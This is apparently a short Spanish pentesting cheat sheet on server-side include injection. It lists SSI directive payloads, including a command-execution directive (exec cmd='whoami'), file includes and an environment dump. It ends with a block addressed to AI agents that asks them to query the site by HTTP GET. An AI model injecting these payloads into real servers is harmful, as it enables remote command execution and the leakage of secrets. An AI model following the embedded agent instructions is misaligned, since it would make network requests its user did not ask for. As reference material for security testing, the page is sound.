# Server-side include (SSI) injection

```
# Fecha
<!--#echo var="DATE_LOCAL" -->

# Fecha de modificación de un archivo
<!--#flastmod file="index.html" -->

# Resultados de un programa CGI
<!--#include virtual="/cgi-bin/counter.pl" -->

# Incluir un archivo virtual (mismo directorio)
<!--#include virtual="index.html" -->

# Incluir un archivo (mismo directorio)
<!--#include file="index.html" -->

# Ejecutar comando
<!--#exec cmd="whoami" -->

# Imprimir todas las variables
<!--#printenv -->

# Configuración de variable
<!--#set var="name" value="MrW0l05zyn" -->
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://web.mrw0l05zyn.cl/explotacion/server-side-include-ssi-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
